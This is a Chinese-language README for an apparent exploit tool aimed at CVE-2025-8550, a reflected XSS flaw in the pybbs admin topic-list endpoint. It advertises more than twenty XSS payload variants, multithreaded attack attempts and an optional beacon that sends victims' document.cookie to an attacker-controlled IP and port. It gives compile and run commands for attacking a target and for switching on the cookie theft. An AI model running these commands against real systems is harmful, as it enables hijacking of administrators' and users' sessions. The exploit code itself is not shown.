本仓库托管了一个针对 CVE-2025-8550 的自动概念验证(PoC)漏洞利用工具,该漏洞是 atjiu pybbs(≤ v6.0.0)中的一个反射型跨站脚本(XSS)漏洞。它针对 /admin/topic/list 端点的 username 参数,该参数缺乏适当的输入过滤。
20 多种载荷变体: script、SVG、iframe、object、onerror 处理器等。
自动 URL 编码: 通过 libcurl 的 curl_easy_escape 确保安全注入。
Cookie 窃取(可选): 信标注入,将 document.cookie 发送至攻击者控制的服务器。
多线程: 使用 pthreads 并行化攻击尝试,加快测试速度。
可定制的命令行界面: 基于 argparse,支持指定:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> 替换为你的 atjiu pybbs 实例。-k 启用 Cookie 窃取信标(需要同时指定 -i 和 -p)。-c。MIT 许可证